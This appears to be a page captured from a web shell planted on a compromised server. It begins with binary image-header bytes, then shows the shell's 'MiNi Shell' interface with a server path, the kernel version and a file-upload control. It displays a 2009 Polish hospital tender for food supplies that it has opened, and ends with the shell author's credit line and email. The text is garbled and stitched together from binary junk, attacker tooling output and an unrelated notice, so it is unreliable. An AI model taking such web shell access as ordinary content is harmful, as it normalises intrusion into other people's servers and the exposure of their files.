JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146157-N-2009.html

<p class="kh_header"><b>Kutno: ŻYWNOŚĆ</b><br>
<b>Numer ogłoszenia: 146157 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kościuszki 52, 99-300 Kutno, woj. łódzkie, tel. 024 3558171, faks 024 355 81 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.kutno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŻYWNOŚĆ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> .różne produkty spożywcze, produkty przemiału ziarna, skrobi, i produktów skrobiowych, oleje i tłuszcze zwierzęce lub roślinne, owoce warzywa i podobne produkty, ryby przetworzone i konserwowane,
.jaja.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 03.14.25.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.Zgodnie z przepisami art. 22 ustawy Prawo zamówień publicznych, o udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy:
A.  Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli posiada: 
1)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2)	Posiada aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
B.  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli:
-	przedstawi wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada  co najmniej wartości 90.000,00 zł. W przypadku podmiotów składających ofertę wspólną zamawiający uzna, że wykonawca spełnia w/w warunek, jeżeli wykaże, że wykonali łącznie wymaganą liczbę dostaw o wartości łącznej  co najmniej 90.000,00 zł.
C.  Znajdują się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, 
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli - jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł. 
D.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli złoży: 
oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.
Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie przedstawionych dokumentów 
wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.	Wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada  co najmniej wartości 90.000,00 zł . W przypadku podmiotów składających ofertę wspólną zamawiający uzna, że wykonawca spełnia w/w warunek, jeżeli wykaże, że wykonali łącznie wymaganą liczbę dostaw o wartości łącznej  co najmniej 90.000,00 zł.
4.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł.
5.	Oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.
6.	Pełnomocnictwo do podpisania oferty ( nie jest wymagane, jeśli podpisujący ofertę jest lub są właścicielami firmy lub jeśli są wymienieni z imienia i nazwiska w dokumencie rejestracyjnym).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zgodnie z § 2 ust.1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców, oraz form, w jakich te dokumenty mogą być składane, składa odpowiednie dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.kutno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 99-300 Kutno, ul. Kościuszki 52.SIWZ można odebrać osobiście-pokój 07d w godz. od 8:00 do 14:00 bądź pocztą po uprzednim, pisemnym wniosku złożonym na adres Zamawi. lub złożonym faksem na nr0243558141.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Kutno 99-300, ul. Kościuszki 52.SIWZ można odebrać osobiście-pokój 07d w godz. od 8:00 do 14:00 bądź pocztą po uprzednim, pisemnym wniosku złożonym na adres Zamawi. lub złożonym faksem na nr0243558141.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pracownikiem uprawnionym do kontaktowania się  z Wykonawcami oraz do udzielania wyjaśnień w godz. 8:00 - 14:00 jest  st. inspektor ds. zamówień publicznych i umów Monika Lewandowska tel./fax 0-24- 355-81-71. Adres poczty elektronicznej: m.lewandowska@szpital.kutno.pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Aromat do ciast  szt.` 10g- 30  2.Biszkopty kg 60  3.Budyń szt.65g-500
4.Cukier kg	-1 500  5.Cukier puder	kg 70 6.Cukier waniliowy szt. 16g-100
7.Dżem szt.260-280g -2 500 8.Fasola sucha kg	509.Galaretka szt. 90g-200
10.Gałka muszkatołowa	szt.15g-10 11.Sosy pieczeniowe szt. 35g-350
12.Groszek konserwowy	szt. 400g	100  13.Bazylia szt. 15g	-100
14.Drożdże szt.100g-120 15.Groch suchy kg-1016.Herbata	szt. `100g	4500
17.Herbatniki Wafle op. 100g-24 18.Herbata ex Lipton op.`50szt 60
 19. 	Herbatniki z cukrem	op.`200g	280
 20.	Imbir	szt. 15g	10
 21.	Estragon	szt. 15g	120
 22.	Kakao	szt. 100g	50
 23.	Kasza manna	kg	300
 24.	Kasza jęczmienna	kg	320
 25.	Kasza gryczana	kg	10
 26.	Kawa naturalna	szt.`100g	600
 27.	Kostki rosołowe	szt.6	200
 28.	Kisiel	szt. 65g	500
 29.	Kukurydza konserwowa 	szt. 400g	120
 30.	Koncentrat pomidorowy	szt. 190g	920
 31.	Koncentrat pomidorowy	szt.900g	480
 32.  	Ketchup	szt. 250g	100
 33.	Konserwa rybna	szt. 170g	600
 34.	Kwasek cytrynowy	szt.20g	1 500
 35.	Liść laurowy	szt.7g	100
 36.	Margaryna	szt.` 250g	400
 37.	Kompot 	szt. 900g	120
 38.	Mąka zwykła	kg	1 800
 39.	Mąka ziemniaczana	kg	50
 40.	Majeranek	szt. 15g	60
 41.	Majonez	szt. 280g	200
 42.	Makaron(różne kształty)	kg	700
 43.	 Makrela wędzona	kg	400
 44.	Miód naturalny	kg0,4L	  5
 45.	Musztarda	szt. 180g	 50
 46.	Ogórki konserwowe	szt.900g	200
 47.	Olej	L	300
 48.	Orzechy włoskie łuskane	kg	10
 49.	Papryka konserwowa	szt. 380g	50
 50.	Ocet	1 L	50
 51.	Papryka mielona	szt. 15g	70
 52.	Pasztet drobiowy	szt. 190g	1 500
 53.	Pieprz naturalny-mielony	szt. 15g	300
 54.	Pieprz naturalny-ziarnisty	szt. 15g	100
 55.	Płatki owsiane	kg	250
 56.	Proszek do pieczenia	szt. 15g	200
 57.	Rodzynki	op.` 100g	30
 58.	Ryż	kg	700
 59.	Skórka pomarańczowa	szt.`100g	40
 60.	Sól	kg	1000
 61.	Suchary	szt. 290g	105
 62.	Szczaw krojony	szt. 260g	400
 63.	Wiórki kokosowe	op.` 100g	35
 64.	Vegeta	szt. 75g	1000
 65.	Oregano	szt.15g	150
 66.	Ziele angielskie	szt. 15g	100
 67.	Zupa grzybowa/pieczarkowa	szt. 35g	200
 68.	Zupa - barszcz biały	szt. 35g	500
 69.	Sosy sałatkowe	szt.	100
 70.	Soki owocowe	0,25L	1000
 71.	Woda mineralna	1,5L	360
72.	Zioła prowansalskie	szt.15g	100
 73.	Woda mineralna	szt. 2,0 L	5800.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja klasy wagowej w granicach od 53g do 63g -klasa M. 	szt.30 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com